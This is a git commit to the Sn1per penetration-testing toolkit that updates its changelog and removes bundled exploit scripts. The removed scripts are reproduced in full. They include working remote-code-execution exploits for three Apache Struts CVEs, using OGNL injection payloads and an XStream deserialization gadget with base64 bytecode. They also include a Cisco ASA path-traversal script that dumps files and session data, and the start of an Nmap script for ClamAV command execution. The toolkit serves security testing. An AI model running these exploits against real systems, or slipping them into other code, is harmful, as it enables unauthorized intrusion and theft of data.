Sn1per Community Edition by @xer0dayz - https://xerosecurity.com

This commit is contained in:
WP Engine Marketing 2019-01-23 18:32:42 -07:00
parent f532cad30b
commit f43e0658ef
46 changed files with 45610 additions and 2592277 deletions

View File

@ -1,22 +1,18 @@
## CHANGELOG:
* v6.1 - Added automated web scanning via Burpsuite Pro 2.x API for all 'web' mode scans
* v6.1 - Added Waybackmachine URL retrieval to all web scans
* v6.1 - Added Elasticsearch Kibana Console LFI CVE-2018-17246 vuln check
* v6.1 - Added 4 levels of brute forcing to all web mode scans
* v6.1 - Added configurable options for ALL scan plugins and options in Sn1per
* v6.1 - Added logging for ALL tools and exploits
* v6.1 - Added NMap latest Github repo to install.sh to fix issue with LUA libs
* v6.1 - Converted all exploits to Metasploit
* v6.1 - Added configuration options to set LHOST/LPORT for all Metasploit exploits in sniper.conf
* v6.1 - Added improved web brute forcing dictionaries for all scan modes
* v6.1 - Added individual logging for all tools under the loot directory
* v6.1 - Added new sniper.conf options to enabled/disable all plugins and change settings per user
* v6.1 - Fixed issue with CMSMap install/usage
* v6.1 - Fixed issue with WPScan gem dependency missing (public_suffix)
* v6.1 - Fixed timeout setting in cutycapt
* v6.1 - Fixed script errors with CVE-2018-15473 sshUsernameEnumExploit.py
* v6.1 - Improved SSLyze scan options
* v6.1 - Updated domain list used by Aquatone
* v6.1 - Removed http-vuln-cve2017-5638.nse script due to outdated NMap libs
* v6.1 - Removed serializekiller plugin from install.sh
* v6.1 - Removed cansina plugin from install.sh
* v6.1 - Removed testssll.sh plugin from install.sh
* v6.1 - Fixed issue with theharvester not running correctly
* v6.1 - Fixed issue with Amass not running due to invalid command line options in latest release
* v6.1 - Fixed issue with Sn1per Professional notepad.html missing
* v6.1 - Cleaned up plugins and install dependencies list
* v6.0 - Improved scan options for discover mode scans
* v6.0 - Fixed issue with pip3 dependency package missing
* v6.0 - Removed iceweasel from install.sh to fix apt error

View File

@ -1,2 +1,2 @@
## LICENSE:
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.
Sn1per Community Edition is free to distribute, modify and use with the condition that credit is provided to the creator (@xer0dayz) and @XeroSecurity and is not for commercial use. For commercial and professional use, a Sn1per Professional license must be purchased at https://xerosecurity.com.

View File

@ -1,226 +0,0 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2018-11776 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code uses a payload from:
# https://github.com/jas502n/St2-057
# *****************************************************
import argparse
import random
import requests
import sys
try:
from urllib import parse as urlparse
except ImportError:
import urlparse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'id')",
action='store',
default='id')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Accept': '*/*'
}
timeout = 3
def parse_url(url):
"""
Parses the URL.
"""
# url: http://example.com/demo/struts2-showcase/index.action
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str("http://") + str(url)
scheme = urlparse.urlparse(url).scheme
# Site: http://example.com
site = scheme + '://' + urlparse.urlparse(url).netloc
# FilePath: /demo/struts2-showcase/index.action
file_path = urlparse.urlparse(url).path
if (file_path == ''):
file_path = '/'
# Filename: index.action
try:
filename = url.split('/')[-1]
except IndexError:
filename = ''
# File Dir: /demo/struts2-showcase/
file_dir = file_path.rstrip(filename)
if (file_dir == ''):
file_dir = '/'
return({"site": site,
"file_dir": file_dir,
"filename": filename})
def build_injection_inputs(url):
"""
Builds injection inputs for the check.
"""
parsed_url = parse_url(url)
injection_inputs = []
url_directories = parsed_url["file_dir"].split("/")
try:
url_directories.remove("")
except ValueError:
pass
for i in range(len(url_directories)):
injection_entry = "/".join(url_directories[:i])
if not injection_entry.startswith("/"):
injection_entry = "/%s" % (injection_entry)
if not injection_entry.endswith("/"):
injection_entry = "%s/" % (injection_entry)
injection_entry += "{{INJECTION_POINT}}/" # It will be renderred later with the payload.
injection_entry += parsed_url["filename"]
injection_inputs.append(injection_entry)
return(injection_inputs)
def check(url):
random_value = int(''.join(random.choice('0123456789') for i in range(2)))
multiplication_value = random_value * random_value
injection_points = build_injection_inputs(url)
parsed_url = parse_url(url)
print("[%] Checking for CVE-2018-11776")
print("[*] URL: %s" % (url))
print("[*] Total of Attempts: (%s)" % (len(injection_points)))
attempts_counter = 0
for injection_point in injection_points:
attempts_counter += 1
print("[%s/%s]" % (attempts_counter, len(injection_points)))
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", "${{%s*%s}}" % (random_value, random_value))
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
continue
if "Location" in resp.headers.keys():
if str(multiplication_value) in resp.headers['Location']:
print("[*] Status: Vulnerable!")
return(injection_point)
print("[*] Status: Not Affected.")
return(None)
def exploit(url, cmd):
parsed_url = parse_url(url)
injection_point = check(url)
if injection_point is None:
print("[%] Target is not vulnerable.")
return(0)
print("[%] Exploiting...")
payload = """%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D""".format(cmd)
testing_url = "%s%s" % (parsed_url["site"], injection_point)
testing_url = testing_url.replace("{{INJECTION_POINT}}", payload)
try:
resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
except Exception as e:
print("EXCEPTION::::--> " + str(e))
return(1)
print("[%] Response:")
print(resp.text)
return(0)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), "r")
URLs_List = f_file.read().replace("\r", "").split("\n")
try:
URLs_List.remove("")
except ValueError:
pass
f_file.close()
except Exception as e:
print("Error: There was an error in reading list file.")
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
check(url)
else:
exploit(url, cmd)
print("[%] Done.")
if __name__ == "__main__":
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print("\nKeyboardInterrupt Detected.")
print("Exiting...")
exit(0)

View File

@ -1,176 +0,0 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2017-5638 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code is based on:
# https://www.exploit-db.com/exploits/41570/
# https://www.seebug.org/vuldb/ssvid-92746
# *****************************************************
import sys
import random
import requests
import argparse
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: id)",
action='store',
default='id')
parser.add_argument("--check",
dest="do_check",
help="Check if a target is vulnerable.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
url = args.url if args.url else None
cmd = args.cmd if args.cmd else None
do_check = args.do_check if args.do_check else None
def url_prepare(url):
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str('http') + str('://') + str(url)
return(url)
def exploit(url, cmd):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
print('[*] CMD: %s' % (cmd))
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='%s')." % cmd
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload),
'Accept': '*/*'
}
timeout = 3
try:
output = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
except Exception as e:
print("EXCEPTION::::--> " + str(e))
output = 'ERROR'
return(output)
def check(url):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
random_string = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for i in range(7))
payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']."
payload += "addHeader('%s','%s')}.multipart/form-data" % (random_string, random_string)
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Content-Type': str(payload),
'Accept': '*/*'
}
timeout = 3
try:
resp = requests.get(url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
if ((random_string in resp.headers.keys()) and (resp.headers[random_string] == random_string)):
result = True
else:
result = False
except Exception as e:
print("EXCEPTION::::--> " + str(e))
result = False
return(result)
def main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check):
if url:
if do_check:
result = check(url) # Only check for existence of Vulnerablity
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
else:
output = exploit(url, cmd) # Exploit
print(output)
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), 'r')
URLs_List = f_file.read().replace('\r', '').split('\n')
try:
URLs_List.remove('')
except ValueError:
pass
f_file.close()
except:
print('Error: There was an error in reading list file.')
exit(1)
for url in URLs_List:
if do_check:
result = check(url) # Only check for existence of Vulnerablity
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
else:
output = exploit(url, cmd) # Exploit
print(output)
print('[%] Done.')
if __name__ == '__main__':
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_check=do_check)
except KeyboardInterrupt:
print('\nKeyboardInterrupt Detected.')
print('Exiting...')
exit(0)

View File

@ -1,324 +0,0 @@
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# struts-pwn: Apache Struts CVE-2017-9805 Exploit
# Author:
# Mazin Ahmed <Mazin AT MazinAhmed DOT net>
# This code is based on:
# https://github.com/rapid7/metasploit-framework/pull/8924
# https://techblog.mediaservice.net/2017/09/detection-payload-for-the-new-struts-rest-vulnerability-cve-2017-9805/
# *****************************************************
import argparse
import requests
import sys
# Disable SSL warnings
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except Exception:
pass
if len(sys.argv) <= 1:
print('[*] CVE: 2017-9805 - Apache Struts2 S2-052')
print('[*] Struts-PWN - @mazen160')
print('\n%s -h for help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url",
dest="url",
help="Check a single URL.",
action='store')
parser.add_argument("-l", "--list",
dest="usedlist",
help="Check a list of URLs.",
action='store')
parser.add_argument("-c", "--cmd",
dest="cmd",
help="Command to execute. (Default: 'echo test > /tmp/struts-pwn')",
action='store',
default='echo test > /tmp/struts-pwn')
parser.add_argument("--exploit",
dest="do_exploit",
help="Exploit.",
action='store_true')
args = parser.parse_args()
url = args.url if args.url else None
usedlist = args.usedlist if args.usedlist else None
url = args.url if args.url else None
cmd = args.cmd if args.cmd else None
do_exploit = args.do_exploit if args.do_exploit else None
def url_prepare(url):
url = url.replace('#', '%23')
url = url.replace(' ', '%20')
if ('://' not in url):
url = str('http') + str('://') + str(url)
return(url)
def exploit(url, cmd, dont_print_status_on_console=False):
url = url_prepare(url)
if dont_print_status_on_console is False:
print('\n[*] URL: %s' % (url))
print('[*] CMD: %s' % (cmd))
cmd = "".join(["<string>{0}</string>".format(_) for _ in cmd.split(" ")])
payload = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
{0}
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
""".format(cmd)
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Referer': str(url),
'Content-Type': 'application/xml',
'Accept': '*/*'
}
timeout = 3
try:
output = requests.post(url, data=payload, headers=headers, verify=False, timeout=timeout, allow_redirects=False).text
except Exception as e:
print("EXCEPTION::::--> " + str(e))
output = 'ERROR'
return(output)
def check(url):
url = url_prepare(url)
print('\n[*] URL: %s' % (url))
initial_request = exploit(url, "", dont_print_status_on_console=True)
if initial_request == "ERROR":
result = False
print("The host does not respond as expected.")
return(result)
payload_sleep_based_10seconds = """
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" serialization="custom">
<com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
<default>
<__name>Pwnr</__name>
<__bytecodes>
<byte-array>yv66vgAAADIAMwoAAwAiBwAxBwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
dFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJD
bGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5
bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94
c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2Vy
aWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFs
YW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUv
eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9u
cwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29t
L3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3Vu
L29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7
KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1B
eGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFs
L3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMu
amF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNs
ZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRp
bWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcv
YXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFs
L3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQAQamF2YS9sYW5nL1RocmVhZAcAKgEA
BXNsZWVwAQAEKEopVgwALAAtCgArAC4BAA1TdGFja01hcFRhYmxlAQAeeXNvc2VyaWFsL1B3bmVy
MTY3MTMxNTc4NjQ1ODk0AQAgTHlzb3NlcmlhbC9Qd25lcjE2NzEzMTU3ODY0NTg5NDsAIQACAAMA
AQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0A
AAAGAAEAAAAuAA4AAAAMAAEAAAAFAA8AMgAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0A
AAAGAAEAAAAzAA4AAAAgAAMAAAABAA8AMgAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAa
AAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA3AA4AAAAqAAQAAAABAA8AMgAA
AAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAiAAMA
AgAAAA2nAAMBTBEnEIW4AC+xAAAAAQAwAAAAAwABAwACACAAAAACACEAEQAAAAoAAQACACMAEAAJ
</byte-array>
<byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFu
dFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEA
EkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2Vy
aWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2
YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xh
bmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRp
bC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQAB
AAAABSq3AAGxAAAAAgANAAAABgABAAAAOwAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAA
AAoAAQACABYAEAAJ</byte-array>
</__bytecodes>
<__transletIndex>-1</__transletIndex>
<__indentNumber>0</__indentNumber>
</default>
<boolean>false</boolean>
</com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
<name>newTransformer</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
"""
headers = {
'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2017-9805)',
# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',
'Referer': str(url),
'Content-Type': 'application/xml',
'Accept': '*/*'
}
timeout = 8
try:
requests.post(url, data=payload_sleep_based_10seconds, headers=headers, verify=False, timeout=timeout, allow_redirects=False)
# if the response returned before the request timeout.
# then, the host should not be vulnerable.
# The request should return > 10 seconds, while the timeout is 8.
result = False
except Exception:
result = True
return(result)
def main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit):
if url:
if not do_exploit:
result = check(url)
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
print(output)
else:
exploit(url, cmd)
print("[$] Request sent.")
print("[.] If the host is vulnerable, the command will be executed in the background.")
if usedlist:
URLs_List = []
try:
f_file = open(str(usedlist), 'r')
URLs_List = f_file.read().replace('\r', '').split('\n')
try:
URLs_List.remove('')
except ValueError:
pass
f_file.close()
except Exception as e:
print('Error: There was an error in reading list file.')
print("Exception: " + str(e))
exit(1)
for url in URLs_List:
if not do_exploit:
result = check(url)
output = '[*] Status: '
if result is True:
output += 'Vulnerable!'
else:
output += 'Not Affected.'
print(output)
else:
exploit(url, cmd)
print("[$] Request sent.")
print("[.] If the host is vulnerable, the command will be executed in the background.")
print('[%] Done.')
if __name__ == '__main__':
try:
main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit)
except KeyboardInterrupt:
print('\nKeyboardInterrupt Detected.')
print('Exiting...')
exit(0)

View File

@ -1,61 +0,0 @@
#!/usr/bin/env python
import requests
import sys
import urlparse
import os
print("""
_____ _____ _____ _____ _____ ___ _____ ___
/ __ \_ _/ ___/ __ \ _ | / _ \ / ___|/ _ \
| / \/ | | \ `--.| / \/ | | | / /_\ \\ `--./ /_\ \
| | | | `--. \ | | | | | | _ | `--. \ _ |
| \__/\_| |_/\__/ / \__/\ \_/ / | | | |/\__/ / | | |
\____/\___/\____/ \____/\___/ \_| |_/\____/\_| |_/
______ _ _ _____ _
| ___ \ | | | | |_ _| | |
| |_/ /_ _| |_| |__ | |_ __ __ ___ _____ _ __ ___ __ _| |
| __/ _` | __| '_ \ | | '__/ _` \ \ / / _ \ '__/ __|/ _` | |
| | | (_| | |_| | | | | | | | (_| |\ V / __/ | \__ \ (_| | |
\_| \__,_|\__|_| |_| \_/_| \__,_| \_/ \___|_| |___/\__,_|_|
CVE-2018-0296
Script author: Yassine Aboukir(@yassineaboukir)
""")
requests.packages.urllib3.disable_warnings()
url = sys.argv[1]
dir_path = os.path.dirname(os.path.realpath(__file__))
filelist_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/"
CSCOE_dir = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b"
active_sessions = "/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/"
logon = "/+CSCOE+/logon.html"
try:
is_cisco_asa = requests.get(urlparse.urljoin(url,logon), verify=False, allow_redirects=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if "webvpnLang" in is_cisco_asa.cookies:
try:
filelist_r = requests.get(urlparse.urljoin(url,filelist_dir), verify=False)
CSCOE_r = requests.get(urlparse.urljoin(url,CSCOE_dir), verify=False)
active_sessions_r = requests.get(urlparse.urljoin(url,active_sessions), verify=False)
except requests.exceptions.RequestException as e:
print(e)
sys.exit(1)
if str(filelist_r.status_code) == "200":
with open(urlparse.urlparse(url).hostname+".txt", "w") as cisco_dump:
cisco_dump.write("======= Directory Index =========\n {}\n ======== +CSCEO+ Directory ========\n {}\n ======= Active sessions =========\n {}".format(filelist_r.text, CSCOE_r.text, active_sessions_r.text))
print("Vulnerable! Check the text dump saved in {}".format(dir_path))
else: print("Not vulnerable!")
else:
print("This is not Cisco ASA! E.g: https://vpn.example.com/+CSCOE+/logon.html\n")
sys.exit(1)

View File

@ -1,243 +0,0 @@
local shortport = require "shortport"
local vulns = require "vulns"
local nmap = require "nmap"
local stdnse = require "stdnse"
local table = require "table"
local io = require "io"
local string = require "string"
description = [[
Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
ClamAV server 0.99.2, and possibly other previous versions, allow the execution
of dangerous service commands without authentication. Specifically, the command 'SCAN'
may be used to list system files and the command 'SHUTDOWN' shut downs the
service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
This script without arguments test the availability of the command 'SCAN'.
Reference:
* https://twitter.com/nitr0usmx/status/740673507684679680
* https://bugzilla.clamav.net/show_bug.cgi?id=11585
]]
---
-- @usage
-- nmap -sV --script clamav-exec <target>
-- nmap --script clamav-exec --script-args cmd='scan',scandb='files.txt' <target>
-- nmap --script clamav-exec --script-args cmd='shutdown' <target>
--
-- @output
-- PORT STATE SERVICE VERSION
-- 3310/tcp open clam ClamAV 0.99.2 (21714)
-- | clamav-exec:
-- | VULNERABLE:
-- | ClamAV Remote Command Execution
-- | State: VULNERABLE
-- | ClamAV 0.99.2, and possibly other previous versions, allow the execution of the
-- | clamav commands SCAN and SHUTDOWN without authentication. The command 'SCAN'
-- | may be used to enumerate system files and the command 'SHUTDOWN' shut downs the
-- | service. This vulnerability was discovered by Alejandro Hernandez (nitr0us).
-- |
-- | Disclosure date: 2016-06-8
-- | Extra information:
-- | SCAN command is enabled.
-- | References:
-- | https://bugzilla.clamav.net/show_bug.cgi?id=11585
-- |_ https://twitter.com/nitr0usmx/status/740673507684679680
-- @xmloutput
-- <table key="NMAP-1">
-- <elem key="title">ClamAV Remote Command Execution</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem>ClamAV 0.99.2, and possibly other previous versions, allow the execution
-- of the &#xa;clamav commands SCAN and SHUTDOWN without authentication.
